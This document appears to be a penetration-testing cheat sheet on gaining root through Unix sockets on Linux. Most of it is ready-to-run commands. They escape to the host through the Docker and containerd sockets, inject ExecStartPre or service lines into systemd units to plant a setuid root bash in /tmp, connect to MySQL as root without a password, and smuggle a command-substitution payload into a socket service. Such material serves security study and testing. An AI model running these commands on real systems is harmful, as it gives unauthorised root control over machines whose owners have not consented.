Unix Socket Abuse

Overview

Unix sockets are inter-process communication endpoints. If a socket is writable or a privileged service listens on one, you can communicate with it to escalate privileges.

Enumerate Unix Sockets

ss -xlp
netstat -a -p --unix 2>/dev/null
find / -type s 2>/dev/null

Find Writable Sockets

find / -type s -writable 2>/dev/null

Check Socket Permissions

ls -la /var/run/*.sock
ls -la /tmp/*.sock

Docker Socket

Most common socket privesc. See Docker / LXD Escape.

Quick Check

ls -la /var/run/docker.sock

If writable:

docker run -v /:/mnt --rm -it alpine chroot /mnt bash

Without docker CLI:

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"Binds":["/:/mnt"],"Privileged":true}' \
  http://localhost/containers/create

Writable .socket Files (systemd)

find /etc/systemd/system/ -writable -name "*.socket" 2>/dev/null

Inject ExecStartPre

[Socket]
ListenStream=/run/vulnerable.sock
ExecStartPre=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'

systemctl daemon-reload
systemctl restart vulnerable.socket

Create Missing Service

If .socket exists but corresponding .service is missing:

# Check what service it activates
cat /etc/systemd/system/vulnerable.socket | grep Service

Create the missing service:

[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'

HTTP Sockets

Some services expose HTTP APIs over Unix sockets.

Connect

curl --unix-socket /var/run/service.sock http://localhost/
curl --unix-socket /var/run/service.sock http://localhost/api/v1/info

Socat

socat - UNIX-CLIENT:/var/run/service.sock

Netcat

nc -U /var/run/service.sock

MySQL Socket

ls -la /var/run/mysqld/mysqld.sock

Connect without password:

mysql -u root -S /var/run/mysqld/mysqld.sock

Containerd Socket

ls -la /run/containerd/containerd.sock

If accessible:

ctr -a /run/containerd/containerd.sock image ls
ctr -a /run/containerd/containerd.sock run --rm -t --mount type=bind,src=/,dst=/mnt,options=rbind docker.io/library/alpine:latest shell /bin/sh
chroot /mnt bash

Socket Command Injection

If a service reads input from a socket and passes it to a shell:

echo '$(cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash)' | socat - UNIX-CLIENT:/var/run/vulnerable.sock

Socket Permissions

Permission	Risk
World-writable socket	Anyone can connect
Group-readable/writable	Group members can connect
Root-owned, no auth	Relies only on filesystem perms

Quick Reference

Socket	Privesc
`/var/run/docker.sock`	Mount host filesystem → root
`/run/containerd/containerd.sock`	Run privileged container
Writable `.socket` file	Inject ExecStartPre
MySQL socket (no password)	DB access, potential UDF RCE
HTTP API socket	Depends on exposed endpoints

Documentation Index

​Overview

​Enumerate Unix Sockets

​Find Writable Sockets

​Check Socket Permissions

​Docker Socket

​Quick Check

​Writable .socket Files (systemd)

​Inject ExecStartPre

​Create Missing Service

​HTTP Sockets

​Connect

​Socat

​Netcat

​MySQL Socket

​Containerd Socket

​Socket Command Injection

​Socket Permissions

​Quick Reference